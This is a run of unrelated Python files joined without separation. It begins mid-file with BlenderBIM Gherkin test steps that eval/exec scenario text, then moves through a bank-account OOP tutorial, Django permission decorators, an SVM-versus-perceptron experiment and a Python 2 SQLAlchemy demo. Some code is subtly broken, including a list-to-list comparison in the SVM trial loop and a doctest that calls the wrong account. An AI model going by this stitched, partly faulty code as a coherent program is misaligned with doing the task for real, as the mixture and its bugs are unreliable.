    """Step: clear the active object and deselect everything."""
    bpy.context.view_layer.objects.active = None
    bpy.ops.object.select_all(action="DESELECT")


def i_am_on_frame_number(number):
    """Step: jump the scene to the given animation frame."""
    bpy.context.scene.frame_set(int(number))


def i_set_prop_to_value(prop, value):
    """Step: assign *value* to a bpy.context property path.

    The path is evaluated first so a missing property fails with a clear
    message; the value is tried as a string, then as a Python literal.
    NOTE(review): eval/exec of scenario text is only acceptable because
    feature files are trusted test fixtures.
    """
    try:
        eval(f"bpy.context.{prop}")
    except:
        assert False, "Property does not exist"
    try:
        exec(f'bpy.context.{prop} = "{value}"')
    except:
        exec(f"bpy.context.{prop} = {value}")


def prop_is_value(prop, value):
    """Step: assert a bpy.context property equals *value*.

    Comparison is attempted as a string, then a literal, then a list;
    on failure the actual value is reported.
    """
    is_value = False
    try:
        exec(f'assert bpy.context.{prop} == "{value}"')
        is_value = True
    except:
        try:
            exec(f"assert bpy.context.{prop} == {value}")
            is_value = True
        except:
            try:
                exec(f"assert list(bpy.context.{prop}) == {value}")
                is_value = True
            except:
                pass
    if not is_value:
        actual_value = eval(f"bpy.context.{prop}")
        assert False, f"Value is {actual_value}"


def i_enable_prop(prop):
    """Step: set a boolean bpy.context property to True."""
    exec(f"bpy.context.{prop} = True")


def i_press_operator(operator):
    """Step: invoke a bpy operator, with or without inline arguments."""
    if "(" in operator:
        exec(f"bpy.ops.{operator}")
    else:
        exec(f"bpy.ops.{operator}()")


def i_rename_the_object_name1_to_name2(name1, name2):
    """Step: rename an existing object."""
    the_object_name_exists(name1).name = name2


def the_object_name_exists(name):
    """Return the named Blender object, failing the scenario if absent."""
    obj = bpy.data.objects.get(name)
    if not obj:
        assert False, f'The object "{name}" does not exist'
    return obj


def an_ifc_file_exists():
    """Return the loaded IFC file, failing the scenario if none is open."""
    ifc = IfcStore.get_file()
    if not ifc:
        assert False, "No IFC file is available"
    return ifc


def an_ifc_file_does_not_exist():
    """Assert that no IFC file is currently loaded."""
    ifc = IfcStore.get_file()
    if ifc:
        assert False, "An IFC is available"


def the_object_name_does_not_exist(name):
    """Assert that no object of the given name exists."""
    assert bpy.data.objects.get(name) is None, "Object exists"


def the_object_name_is_an_ifc_class(name, ifc_class):
    """Assert the object's linked IFC element is (a subtype of) *ifc_class*."""
    ifc = an_ifc_file_exists()
    element = ifc.by_id(the_object_name_exists(name).BIMObjectProperties.ifc_definition_id)
    assert element.is_a(ifc_class), f'Object "{name}" is an {element.is_a()}'


def the_object_name_is_not_an_ifc_element(name):
    """Assert the object has no linked IFC element (definition id of 0)."""
    # Renamed the local from `id`, which shadowed the builtin of the same name.
    element_id = the_object_name_exists(name).BIMObjectProperties.ifc_definition_id
    assert element_id == 0, f"The ID is {element_id}"


def the_object_name_is_in_the_collection_collection(name, collection):
    """Assert the object is linked into the named collection."""
    assert collection in [c.name for c in the_object_name_exists(name).users_collection]


def the_object_name_is_not_in_the_collection_collection(name, collection):
    """Assert the object is not linked into the named collection."""
    assert collection not in [c.name for c in the_object_name_exists(name).users_collection]


def the_object_name_has_a_body_of_value(name, value):
    """Assert a text object's body equals *value*."""
    assert the_object_name_exists(name).data.body == value


def the_collection_name1_is_in_the_collection_name2(name1, name2):
    """Assert collection *name1* is a child of collection *name2*."""
    assert bpy.data.collections.get(name2).children.get(name1)


def the_collection_name1_is_not_in_the_collection_name2(name1, name2):
    """Assert collection *name1* is not a child of collection *name2*."""
    assert not bpy.data.collections.get(name2).children.get(name1)


def the_object_name_is_placed_in_the_collection_collection(name, collection):
    """Unlink the object from all current collections, then link it into *collection*."""
    obj = the_object_name_exists(name)
    # A plain loop rather than a list comprehension built only for its side effects.
    for user_collection in obj.users_collection:
        user_collection.objects.unlink(obj)
    bpy.data.collections.get(collection).objects.link(obj)


def the_object_name_has_a_type_representation_of_context(name, type, context):
    """Assert the element has a representation for "context/subcontext/target_view".

    NOTE(review): the *type* parameter shadows the builtin and is unused here —
    the regex captures it but only *context* drives the lookup; verify intent.
    """
    ifc = an_ifc_file_exists()
    element = ifc.by_id(the_object_name_exists(name).BIMObjectProperties.ifc_definition_id)
    context, subcontext, target_view = context.split("/")
    assert ifcopenshell.util.representation.get_representation(
        element, context, subcontext or None, target_view or None
    )


def the_object_name_is_contained_in_container_name(name, container_name):
    """Assert the element's spatial container is named *container_name*."""
    # BUG FIX: only ifcopenshell.util.representation is imported at module
    # level; ensure the util.element submodule is actually loaded before use.
    import ifcopenshell.util.element
    ifc = an_ifc_file_exists()
    element = ifc.by_id(the_object_name_exists(name).BIMObjectProperties.ifc_definition_id)
    container = ifcopenshell.util.element.get_container(element)
    if not container:
        assert False, f'Object "{name}" is not in any container'
    assert container.Name == container_name, f'Object "{name}" is in {container}'


def i_duplicate_the_selected_objects():
    """Step: duplicate the selection, then resync BlenderBIM's active-object state."""
    bpy.ops.object.duplicate_move()
    blenderbim.bim.handler.active_object_callback()


def i_delete_the_selected_objects():
    """Step: delete the selection, then resync BlenderBIM's active-object state."""
    bpy.ops.object.delete()
    blenderbim.bim.handler.active_object_callback()


def the_object_name1_and_name2_are_different_elements(name1, name2):
    """Assert two objects are linked to two distinct IFC elements."""
    ifc = an_ifc_file_exists()
    element1 = ifc.by_id(the_object_name_exists(name1).BIMObjectProperties.ifc_definition_id)
    element2 = ifc.by_id(the_object_name_exists(name2).BIMObjectProperties.ifc_definition_id)
    assert element1 != element2, f"Objects {name1} and {name2} have same elements {element1} and {element2}"


def the_file_name_should_contain_value(name, value):
    """Assert that the file at path *name* contains the substring *value*."""
    with open(name, "r") as stream:
        contents = stream.read()
    assert value in contents


def the_object_name1_has_a_boolean_difference_by_name2(name1, name2):
    """Assert *name1* carries a BOOLEAN modifier whose object is *name2*."""
    obj = the_object_name_exists(name1)
    for modifier in obj.modifiers:
        if modifier.type == "BOOLEAN" and modifier.object and modifier.object.name == name2:
            return True
    assert False, "No boolean found"


def the_object_name1_has_no_boolean_difference_by_name2(name1, name2):
    """Assert *name1* has no BOOLEAN modifier targeting *name2*."""
    obj = the_object_name_exists(name1)
    for modifier in obj.modifiers:
        if modifier.type == "BOOLEAN" and modifier.object and modifier.object.name == name2:
            assert False, "A boolean was found"


def the_object_name_is_voided_by_void(name, void):
    """Assert the element has an opening relation to an opening named *void*."""
    ifc = IfcStore.get_file()
    element = ifc.by_id(the_object_name_exists(name).BIMObjectProperties.ifc_definition_id)
    for rel in element.HasOpenings:
        if rel.RelatedOpeningElement.Name == void:
            return True
    assert False, "No void found"


def the_object_name_is_not_voided_by_void(name, void):
    """Assert the element has no opening relation to an opening named *void*."""
    ifc = IfcStore.get_file()
    element = ifc.by_id(the_object_name_exists(name).BIMObjectProperties.ifc_definition_id)
    for rel in element.HasOpenings:
        if rel.RelatedOpeningElement.Name == void:
            assert False, "A void was found"


def the_object_name_is_not_voided(name):
    """Assert the element has no openings at all."""
    ifc = IfcStore.get_file()
    element = ifc.by_id(the_object_name_exists(name).BIMObjectProperties.ifc_definition_id)
    if any(element.HasOpenings):
        assert False, "An opening was found"


def the_object_name_is_not_a_void(name):
    """Assert the element does not itself void any other element."""
    ifc = IfcStore.get_file()
    element = ifc.by_id(the_object_name_exists(name).BIMObjectProperties.ifc_definition_id)
    if any(element.VoidsElements):
        assert False, "A void was found"


def the_void_name_is_filled_by_filling(name, filling):
    """Assert the opening *name* is filled by an element named *filling*."""
    ifc = IfcStore.get_file()
    element = ifc.by_id(the_object_name_exists(name).BIMObjectProperties.ifc_definition_id)
    if any(rel.RelatedBuildingElement.Name == filling for rel in element.HasFillings):
        return True
    assert False, "No filling found"


def the_void_name_is_not_filled_by_filling(name, filling):
    """Assert the opening *name* is not filled by an element named *filling*."""
    ifc = IfcStore.get_file()
    element = ifc.by_id(the_object_name_exists(name).BIMObjectProperties.ifc_definition_id)
    if any(rel.RelatedBuildingElement.Name == filling for rel in element.HasFillings):
        assert False, "A filling was found"


def the_object_name_is_not_a_filling(name):
    """Assert the element does not fill any opening."""
    ifc = IfcStore.get_file()
    element = ifc.by_id(the_object_name_exists(name).BIMObjectProperties.ifc_definition_id)
    if any(element.FillsVoids):
        assert False, "A filling was found"


def the_object_name_should_display_as_mode(name, mode):
    """Assert the object's viewport display type (e.g. "WIRE")."""
    assert the_object_name_exists(name).display_type == mode


def the_object_name_has_number_vertices(name, number):
    """Assert the object's mesh has exactly *number* vertices."""
    total = len(the_object_name_exists(name).data.vertices)
    assert total == int(number), f"We found {total} vertices"


def the_object_name_is_at_location(name, location):
    """Assert the object sits within 0.1 units of "x,y,z"."""
    obj_location = the_object_name_exists(name).location
    assert (
        obj_location - Vector([float(co) for co in location.split(",")])
    ).length < 0.1, f"Object is at {obj_location}"


def the_variable_key_is_value(key, value):
    """Step: store eval(value) under *key* for later "{key}" substitution.

    NOTE(review): eval of scenario text — acceptable only for trusted fixtures.
    """
    variables[key] = eval(value)


# Maps fully-anchored step regexes to their implementing callables; matched
# against each scenario line by run() in this module.
definitions = {
    'the variable "(.*)" is "(.*)"': the_variable_key_is_value,
    "an empty IFC project": an_empty_ifc_project,
    "I add a cube": i_add_a_cube,
    'I add a cube of size "([0-9]+)" at "(.*)"': i_add_a_cube_of_size_size_at_location,
    'the object "(.*)" is selected': the_object_name_is_selected,
    'additionally the object "(.*)" is selected': additionally_the_object_name_is_selected,
    "I deselect all objects": i_deselect_all_objects,
    'I am on frame "([0-9]+)"': i_am_on_frame_number,
    'I set "(.*)" to "(.*)"': i_set_prop_to_value,
    '"(.*)" is "(.*)"': prop_is_value,
    'I enable "(.*)"': i_enable_prop,
    'I press "(.*)"': i_press_operator,
    'I rename the object "(.*)" to "(.*)"': i_rename_the_object_name1_to_name2,
    'the object "(.*)" exists': the_object_name_exists,
    'the object "(.*)" does not exist': the_object_name_does_not_exist,
    'the object "(.*)" is an "(.*)"': the_object_name_is_an_ifc_class,
    'the object "(.*)" is not an IFC element': the_object_name_is_not_an_ifc_element,
    'the object "(.*)" is in the collection "(.*)"': the_object_name_is_in_the_collection_collection,
    'the object "(.*)" is not in the collection "(.*)"': the_object_name_is_not_in_the_collection_collection,
    'the object "(.*)" has a body of "(.*)"': the_object_name_has_a_body_of_value,
    'the collection "(.*)" is in the collection "(.*)"': the_collection_name1_is_in_the_collection_name2,
    'the collection "(.*)" is not in the collection "(.*)"': the_collection_name1_is_not_in_the_collection_name2,
    "an IFC file exists": an_ifc_file_exists,
    "an IFC file does not exist": an_ifc_file_does_not_exist,
    'the object "(.*)" has a "(.*)" representation of "(.*)"': the_object_name_has_a_type_representation_of_context,
    'the object "(.*)" is placed in the collection "(.*)"': the_object_name_is_placed_in_the_collection_collection,
    'the object "(.*)" is contained in "(.*)"': the_object_name_is_contained_in_container_name,
    "I duplicate the selected objects": i_duplicate_the_selected_objects,
    "I delete the selected objects": i_delete_the_selected_objects,
    'the object "(.*)" and "(.*)" are different elements': the_object_name1_and_name2_are_different_elements,
    'the file "(.*)" should contain "(.*)"': the_file_name_should_contain_value,
    'the object "(.*)" has a boolean difference by "(.*)"': the_object_name1_has_a_boolean_difference_by_name2,
    'the object "(.*)" has no boolean difference by "(.*)"': the_object_name1_has_no_boolean_difference_by_name2,
    'the object "(.*)" is voided by "(.*)"': the_object_name_is_voided_by_void,
    'the object "(.*)" is not voided by "(.*)"': the_object_name_is_not_voided_by_void,
    'the object "(.*)" is not a void': the_object_name_is_not_a_void,
    'the object "(.*)" is not voided': the_object_name_is_not_voided,
    'the object "(.*)" should display as "(.*)"': the_object_name_should_display_as_mode,
    'the object "(.*)" has "([0-9]+)" vertices': the_object_name_has_number_vertices,
    'the object "(.*)" is at "(.*)"': the_object_name_is_at_location,
    "nothing interesting happens": lambda: None,
    'the void "(.*)" is filled by "(.*)"': the_void_name_is_filled_by_filling,
    'the void "(.*)" is not filled by "(.*)"': the_void_name_is_not_filled_by_filling,
    'the object "(.*)" is not a filling': the_object_name_is_not_a_filling,
}


# Super lightweight Gherkin implementation
def run(scenario):
    """Execute a Gherkin scenario string against the step ``definitions``.

    Each line is variable-substituted, stripped of its leading Gherkin
    keyword, then matched (fully anchored) against the definition regexes.
    Raises AssertionError on a failing or unimplemented step; returns True.
    """
    keywords = ("Given", "When", "Then", "And", "But")
    for line in scenario.split("\n"):
        # Substitute "{variable}" placeholders first.
        for key, value in variables.items():
            line = line.replace("{" + key + "}", str(value))
        line = line.strip()
        # BUG FIX: strip only a single *leading* keyword. The previous
        # blanket line.replace(keyword, "") also mangled keyword substrings
        # occurring inside the step text itself.
        for keyword in keywords:
            if line.startswith(keyword):
                line = line[len(keyword):].strip()
                break
        if not line:
            continue
        match = None
        for definition, callback in definitions.items():
            match = re.search("^" + definition + "$", line)
            if match:
                try:
                    callback(*match.groups())
                except AssertionError as e:
                    assert False, f"Failed: {line}, with error: {e}"
                break
        if not match:
            assert False, f"Definition not implemented: {line}"
    return True


def run_debug(scenario, blend_filepath=None):
    """Run a scenario; when *blend_filepath* is given, save the .blend file
    both on failure and success so the session can be inspected."""
    def snapshot():
        # Persist the current Blender session for post-mortem debugging.
        if blend_filepath:
            bpy.ops.wm.save_as_mainfile(filepath=blend_filepath)

    try:
        outcome = run(scenario)
    except Exception as error:
        snapshot()
        assert False, error
    snapshot()
    return outcome

import os
import sys
import string
import random
import math


#################################################
# State

# Module-level account balance mutated by deposit()/withdraw() below.
balance = 0


def deposit(amount):
    """Add *amount* to the module-level balance; return the new balance."""
    global balance
    balance = balance + amount
    return balance


def withdraw(amount):
    """Subtract *amount* from the module-level balance; return the new balance."""
    global balance
    balance = balance - amount
    return balance

#################################################
# Dict like


def make_account():
    """Create a fresh account record with a zero balance."""
    return dict(balance=0)


def deposit(account, amount):
    """Increase the account's balance by *amount*; return the new balance."""
    new_balance = account['balance'] + amount
    account['balance'] = new_balance
    return new_balance


def withdraw(account, amount):
    """Decrease the account's balance by *amount*; return the new balance."""
    new_balance = account['balance'] - amount
    account['balance'] = new_balance
    return new_balance


# >>> a = make_account()
# >>> b = make_account()
# >>> deposit(a, 100)
# 100
# >>> deposit(b, 50)
# 50
# >>> withdraw(b, 10)
# 40
# >>> withdraw(a, 10)
# 90

#################################################
# Class


class BankAccount:
    """A minimal bank account wrapping a mutable balance."""

    def __init__(self, balance=0):
        # Starting balance; defaults to zero.
        self.balance = balance

    def deposit(self, amount):
        """Add *amount*; return the resulting balance."""
        self.balance += amount
        return self.balance

    def withdraw(self, amount):
        """Remove *amount*; return the resulting balance."""
        self.balance -= amount
        return self.balance


# >>> a = BankAccount()
# >>> b = BankAccount()
# >>> a.deposit(100)
# 100
# >>> b.deposit(50)
# 50
# >>> b.withdraw(10)
# 40
# >>> a.withdraw(10)
# 90

#################################################
# Inheritance


class MinimumBalanceAccount(BankAccount):
    """Bank account that refuses withdrawals dropping below a minimum balance."""

    def __init__(self, minimum_balance):
        super().__init__()
        # Floor the balance may never sink under via withdraw().
        self.minimum_balance = minimum_balance

    def withdraw(self, amount):
        """Withdraw only if the balance stays at or above the minimum."""
        if self.balance - amount >= self.minimum_balance:
            super().withdraw(amount)
        else:
            print('Sorry, minimum balance must be maintained.')

# >>> a = MinimumBalanceAccount(0)
# >>> a.deposit(100)
# 100
# >>> b.withdraw(101)
# 'Sorry, minimum balance must be maintained.'


########################################
# Mangling, Exceptions


def generate_id(n=16):
    """Return a random alphanumeric identifier of length *n* (default 16)."""
    alphabet = string.ascii_letters + string.digits
    return ''.join(random.choices(alphabet, k=n))


class WithdrawError(Exception):
    """Raised when a withdrawal exceeds the available balance."""

    def __init__(self, amount):
        super().__init__()
        # The amount that could not be withdrawn.
        self.amount = amount


class AdvancedBankAccount:
    """Account demonstrating name mangling, class attributes and exceptions."""

    MAX_BALANCE = 2 ** 64  # class-level cap shared by all instances

    def __init__(self):
        self._balance = 0            # "protected" by convention only
        self.__id = generate_id()    # mangled to _AdvancedBankAccount__id

    def withdraw(self, amount):
        """Withdraw *amount* and return the new balance.

        Raises ValueError if *amount* is not an int, and WithdrawError if
        the balance is insufficient.
        """
        if not isinstance(amount, int):
            raise ValueError
        if self._balance < amount:
            raise WithdrawError(amount)
        self._balance -= amount
        return self._balance

    def deposit(self, amount):
        """Add *amount* and return the new balance."""
        self._balance += amount
        return self._balance

    @staticmethod
    def get_max_balance():
        # BUG FIX: without @staticmethod this method took no `self` yet was
        # an instance method, so calling it on an instance raised TypeError.
        # Calling on the class (as in the demo below) keeps working.
        return AdvancedBankAccount.MAX_BALANCE

if __name__ == '__main__':
    # Demo of aliasing, name mangling, static attributes and exceptions.
    a = AdvancedBankAccount()
    b = a  # alias: a and b refer to the same object
    c = AdvancedBankAccount()
    a.deposit(10)
    # AdvancedBankAccount.deposit(a, 10) # the same
    print('UNACCEPTABLE! b balance:', b._balance)
    # print(b.__id) # error, name mangling
    a.get_id = lambda self: self.__id
    # print(a.get_id())  # TypeError
    # print(a.get_id(a)) # AttributeError

    ################################################
    # UNACCEPTABLE!
    print("UNACCEPTABLE! b id:", b._AdvancedBankAccount__id)  # name unmangling

    # static
    # Class attribute assignment affects every instance reading it...
    AdvancedBankAccount.MAX_BALANCE = 2 ** 32
    print('max balance:', AdvancedBankAccount.get_max_balance())
    # ...while instance assignment creates a shadowing instance attribute.
    a.MAX_BALANCE = 2 ** 64
    print('a max: {}, c max: {}'.format(a.MAX_BALANCE,
                                        c.MAX_BALANCE))

    ################################################
    # Exceptions

    # in module import
    try:
        a.withdraw("100")
    except:
        pass
        # UNACCEPTABLE: bare except silently swallows everything
    try:
        a.withdraw(100)
    except WithdrawError as e:
        pass

    try:
        a.withdraw(100)
    except (ValueError, WithdrawError) as e:
        print('exception raised')
    else:
        print('no exception')
    finally:
        print('Finally')

    def tricky():
        # A return in `finally` overrides the return from `try`.
        try:
            print('Tricky called')
            return 1
        finally:
            print('Tricky finally called')
            return 42
        return 0

    print(tricky())
    # how about with statement?
    # module is object -> import

class Shape:
    """Abstract base: concrete shapes must override area()."""

    def area(self):
        raise NotImplementedError

class Circle(Shape):
    """Circle defined by its radius."""

    def __init__(self, radius):
        self.radius = radius

    def area(self):
        """Return the circle's area, pi * r**2."""
        return math.pi * self.radius ** 2

class Square(Shape):
    """Axis-aligned square defined by its side length."""

    def __init__(self, side):
        self.side = side

    def area(self):
        """Return the square's area, side**2."""
        return self.side ** 2


if __name__ == "__main__":
    a = [Square(10), Circle(2)]
    s = sum(s.area() for s in a)
    print(s)



class PermissionRequired(Exception):
    """
    Raised by views which check permissions internally.

    Carries a single ``perm`` attribute naming the permission whose
    absence triggered the exception.
    """
    def __init__(self, perm):
        self.perm = perm


def require_permissions(user, *permissions):
    """Raise PermissionRequired for the first permission *user* lacks.

    Permissions are checked lazily, in order; returns None if all pass.
    """
    for perm in permissions:
        if user.has_perm(perm):
            continue
        raise PermissionRequired(perm)


class checks_permissions(object):
    """
    Decorator for views which handle C{PermissionRequired} errors and renders
    the given error view if necessary.
    The original request and arguments are passed to the error with the
    additional C{_perm} and C{_view} keyword arguments.

    Supports both bare usage (@checks_permissions) and parameterized usage
    (@checks_permissions('path.to.error_view')).
    """
    def __init__(self, view_or_error=None):
        # Bare usage passes the view callable itself; parameterized usage
        # passes an error-view path (or None → settings.PERMISSIONS_VIEW).
        self.wrapped = callable(view_or_error)
        error_view = None
        
        if self.wrapped:
            self.view = view_or_error
        else:
            error_view = view_or_error
        
        if not error_view:
            from django.conf import settings
            error_view = settings.PERMISSIONS_VIEW
        
        # NOTE(review): django.core.urlresolvers was removed in Django 2.0
        # (django.urls.get_callable is its successor) — this targets old Django.
        from django.core.urlresolvers import get_callable
        self.error_view = get_callable(error_view)
    
    def __call__(self, view_or_request, *args, **kwargs):
        # Bare usage: __call__ receives the request; parameterized: the view.
        if not self.wrapped:
            self.view = view_or_request
        
        def dec(*args, **kwargs):
            try:
                return self.view(*args, **kwargs)
            except PermissionRequired as e:
                # Forward the failed permission and the original view on to
                # the error view alongside the request/arguments.
                kwargs['_perm'] = e.perm
                kwargs['_view'] = self.view
                return self.error_view(*args, **kwargs)
        
        return dec(view_or_request, *args, **kwargs) if self.wrapped else dec


class permission_required(object):
    """
    Decorator which builds upon the C{checks_permission} decorator to offer
    the same functionality as the built-in
    C{django.contrib.auth.decorators.permission_required} decorator but which
    renders an error view instead of redirecting to the login page.
    """
    def __init__(self, perm, error_view=None):
        # perm: the permission string required; error_view: optional view
        # (path) rendered on failure, falling back to settings.PERMISSIONS_VIEW.
        self.perm = perm
        self.error_view = error_view
    
    def __call__(self, view_func):
        def decorator(request, *args, **kwargs):
            if not request.user.has_perm(self.perm):
                raise PermissionRequired(self.perm)
            return view_func(request, *args, **kwargs)
        # Delegate error handling/rendering to checks_permissions.
        return checks_permissions(self.error_view)(decorator)



# -*- coding: utf-8 -*-
"""
Created on Fri Nov 15 15:55:28 2013

@author: dyanna
"""

import numpy as np
from sklearn.svm import SVC

def getSample(pointA, pointB, numberOfPoints):
    """Sample *numberOfPoints* uniform points in [-1,1]^2, labelled +/-1 by
    which side of the line through pointA/pointB each falls on.

    Resamples until both labels occur, so the result is never single-class.
    Returns an array with columns [x, y, label].
    """
    # The original shadowed the builtin `breakpoint` as its loop flag and
    # duplicated the sampling code; both are folded into one loop here.
    while True:
        xs = np.random.uniform(-1, 1.00, numberOfPoints)
        ys = np.random.uniform(-1, 1.00, numberOfPoints)
        sample = np.array([(x, y, isLeft(pointA, pointB, (x, y)))
                           for x, y in zip(xs, ys)])
        labels = sample[:, 2]
        if len(labels[labels == -1]) > 0 and len(labels[labels == 1]) > 0:
            return sample

def getRandomLine():
    """Return two random points in [-1,1]^2 defining a line."""
    xs = np.random.uniform(-1, 1.00, 2)
    ys = np.random.uniform(-1, 1.00, 2)
    return list(zip(xs, ys))

def getPoints(numberOfPoints):
    """Return *numberOfPoints* random (x, y) points uniform in [-1,1]^2."""
    xs = np.random.uniform(-1, 1.00, numberOfPoints)
    ys = np.random.uniform(-1, 1.00, numberOfPoints)
    return list(zip(xs, ys))

def isLeft(a, b, c):
    """Return 1 if point *c* lies strictly left of the directed line a->b,
    else -1 (collinear points count as -1)."""
    # 2-D cross product of (b - a) x (c - a); sign gives the side.
    cross = (b[0] - a[0]) * (c[1] - a[1]) - (b[1] - a[1]) * (c[0] - a[0])
    return 1 if cross > 0 else -1

def sign(x):
    """Return 1 for positive x, otherwise -1 (zero maps to -1)."""
    if x > 0:
        return 1
    return -1


def getMisMatchesQP(data, clf):
    """Return the fraction of rows in *data* misclassified by classifier *clf*.

    data: array with columns [x, y, label]; clf: a fitted sklearn classifier.
    Also prints the mismatch fraction and the classifier's own score.
    """
    data_x = np.c_[data[:,0], data[:,1]]
    results = clf.predict(data_x)
    print("mismatch ", float(len(data) - np.sum(np.sign(results) == np.sign(data[:,2])))/len(data))
    print("score ", clf.score(data_x, data[:,2]))
    
    return float(len(data) - np.sum(np.sign(results) == np.sign(data[:,2])))/len(data)
    


def doMonteCarloQP(pointa, pointb, clf, nopoint):
    """Monte-Carlo estimate of *clf*'s out-of-sample error.

    Draws *nopoint* fresh points labelled by the true line (pointa, pointb)
    and returns the misclassification fraction.
    """
    points = [(np.random.uniform(-1,1), np.random.uniform(-1,1)) for i in range(nopoint)]
    dataset_Monte = np.array([(i[0],i[1], isLeft(pointa,pointb,i)) for i in points])
    return getMisMatchesQP(dataset_Monte, clf)

def doPLA(sample):
    """Run the perceptron learning algorithm on *sample* (columns x, y, label).

    Returns (weights, iterations) with weights [w0, w1, w2] for the
    decision value w0 + w1*x + w2*y.
    """
    w = np.array([0,0,0])
    iteration = 0
    it = 0
    while True:#(it < 10):
        iteration = iteration + 1
        it = it + 1
        mismatch = list()
        for i in sample:
            # Decision value of the current weights at this point.
            yy = w[0] + w[1] * i[0] + w[2] * i[1]
            point = [i[0], i[1], sign(yy)]
            # NOTE(review): this collects points whose [x, y, predicted]
            # row exists in the sample, then pushes predicted-negative
            # points up and others down. This bookkeeping looks inverted
            # relative to the textbook PLA update — verify against intent.
            if any(np.equal(sample, point).all(1)):
                if(point[2] == -1):
                    mismatch.append((1, (i[0]), (i[1])))
                else:
                    mismatch.append((-1, -(i[0]), -(i[1])))
        if(len(mismatch) > 0):
            # Update the weights with one randomly chosen collected point.
            choiceIndex = np.random.randint(0, len(mismatch))
            choice = mismatch[choiceIndex]
            w = w + choice
        else:
            # No updates left: the sample is (per this criterion) separated.
            break
    return w, iteration

def getMisMatches(data, weights):
    """Fraction of rows in *data* misclassified by the (negated) linear model.

    data: array with columns [x, y, label]; weights: [w0, w1, w2].
    """
    bias = np.full(len(data), weights[0])
    scores = -(bias + weights[1] * data[:, 0] + weights[2] * data[:, 1])
    matches = np.sum(np.sign(scores) == np.sign(data[:, 2]))
    return float(len(data) - matches) / len(data)
    


def doMonteCarloNP(pointa, pointb, weights, nopoint):
    """Monte-Carlo estimate of the perceptron weights' out-of-sample error.

    Draws *nopoint* fresh points labelled by the true line (pointa, pointb)
    and returns the misclassification fraction under *weights*.
    """
    points = [(np.random.uniform(-1,1), np.random.uniform(-1,1)) for i in range(nopoint)]
    dataset_Monte = np.array([(i[0],i[1], isLeft(pointa,pointb,i)) for i in points])
    return getMisMatches(dataset_Monte, weights)


if __name__ == "__main__":
    '''X = np.array([[-1,-1],[-2,-1], [1,1], [2,1]])
    y = np.array([1,1,2,2])
    clf = SVC()
    clf.fit(X,y)
    print(clf.predict([[-0.8,-1]]))'''
    #clf = SVC()
    clf = SVC(C = 1000, kernel = 'linear')  
    monteavgavgQP = list()
    monteavgavgPLA = list()
    approxavgQP = list()
    vectornumberavg = list()
    predictavg = list()
    for j in range(1):
        #clf = SVC(C = 1000, kernel = 'linear') 
        monteavgQP = list()
        monteavgPLA = list()
        approxQP = list()
        vectoravg = list()
        for k in range(1000):
            nopoints = 100
            line = getRandomLine()
            sample = getSample(line[0], line[1], nopoints)
            #print(sample)
            X = np.c_[sample[:,0], sample[:,1]]
            y = sample[:,2]
            #print(y)
            clf.fit(X,y)
            #print(clf.score(X,y))
            w, it = doPLA(sample)
            #print(len(clf.support_vectors_))
            #print(clf.support_vectors_)
            #print(clf.support_)
            vectoravg.append(len(clf.support_vectors_))
            #print(clf.predict(clf.support_vectors_)==1)
            #print(clf.predict(clf.support_vectors_))
            #print(clf.coef_)
            montelistQP = [doMonteCarloQP(line[0], line[1], clf, 500) for i in range(1)]
            qpMonte = sum(montelistQP)/len(montelistQP)
            monteavgQP.append(sum(montelistQP)/len(montelistQP))
            
            montelist = [ doMonteCarloNP(line[0], line[1], w, 500) for i in range(1)]
            plaMonte = sum(montelist)/len(montelist)
            monteavgPLA.append(plaMonte)
            if(montelistQP < monteavgPLA):
                approxQP.append(1)
            else:
                approxQP.append(0)
            
        #print(sum(monteavgQP)/len(monteavgQP))
        #print(sum(monteavgPLA)/len(monteavgPLA))
        #print(sum(approxQP)/len(approxQP))
        monteavgavgQP.append(sum(monteavgQP)/len(monteavgQP))
        monteavgavgPLA.append(sum(monteavgPLA)/len(monteavgPLA))
        approxavgQP.append(sum(approxQP)/len(approxQP))
        vectornumberavg.append(sum(vectoravg)/len(vectoravg))
    print(sum(monteavgavgQP)/len(monteavgavgQP))
    print(sum(monteavgavgPLA)/len(monteavgavgPLA))
    print("how good is it? ", sum(approxavgQP)/len(approxavgQP))
    print("how good is it? ", sum(vectornumberavg)/len(vectornumberavg))
    
    
from sqlalchemy import create_engine, Column, Integer, String, ForeignKey, Table
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker, relationship

# demo many to many relationship
# http://docs.sqlalchemy.org/en/rel_0_9/orm/basic_relationships.html#many-to-many

# File-backed SQLite database in the current working directory.
engine = create_engine('sqlite:///manymany.db')
Base = declarative_base()

# Plain association table (no mapped class) linking member <-> club.
# Also see: http://docs.sqlalchemy.org/en/rel_0_9/orm/basic_relationships.html#association-object
member_club_mapping = Table('member_club_mapping', Base.metadata,
                            Column('member_id', Integer, ForeignKey('member.id')),
                            Column('club_id', Integer, ForeignKey('club.id')))

class Member(Base):
    """A person; related many-to-many to Club via member_club_mapping."""
    __tablename__ = 'member'

    id = Column(Integer, primary_key=True)
    first_name = Column(String)
    last_name = Column(String)
    # secondary= routes link rows through the association table;
    # back_populates keeps Member.clubs and Club.members in sync in-session.
    clubs = relationship('Club', back_populates='members',
                         secondary=member_club_mapping)
    def __init__(self, first_name, last_name):
        self.first_name = first_name
        self.last_name = last_name

class Club(Base):
    """A club; the other side of the Member many-to-many."""
    __tablename__ = 'club'

    id = Column(Integer, primary_key=True)
    name = Column(String)
    # Mirror of Member.clubs over the same association table.
    members = relationship('Member', back_populates='clubs',
                           secondary=member_club_mapping)
    def __init__(self, name):
        self.name = name

# create tables (no-op for tables that already exist in the SQLite file)
Base.metadata.create_all(engine)
# create a Session factory bound to the engine, then one working session
Session = sessionmaker(bind=engine)
session = Session()

# Populate: John Doe joins two clubs. Appending to the relationship
# collection is what creates the association rows; adding the club also
# cascades the pending member into the session.
member1 = Member('John', 'Doe')
club1 = Club('Club dub')
club1.members.append(member1)
session.add(club1)

club2 = Club('Club dub dub')
club2.members.append(member1)
session.add(club2)

club3 = Club('Club dub step')
session.add(club3)

# The relationship can be driven from either side: extend the member's clubs.
member2 = Member('Jane', 'Allen')
member2.clubs.extend([club1, club2])
session.add(member2)

session.commit()

# query and print every Member with the clubs they belong to
# NOTE: Python 2 print statements -- this demo module is Python 2 only.
res = session.query(Member).all()
for member in res:
    print member.first_name, member.last_name , [club.name for club in member.clubs]

# query and print every Club with its member names
res = session.query(Club).all()
for club in res:
    print club.name, [(member.first_name, member.last_name) for member in club.members]

print 'After removing members with first name: Jane'
# Delete the Member rows; the association rows should go with them
# (presumably handled by the secondary relationship -- verify with echo=True).
record = session.query(Member).filter(Member.first_name == 'Jane').all()
for r in record:
    session.delete(r)

session.commit()

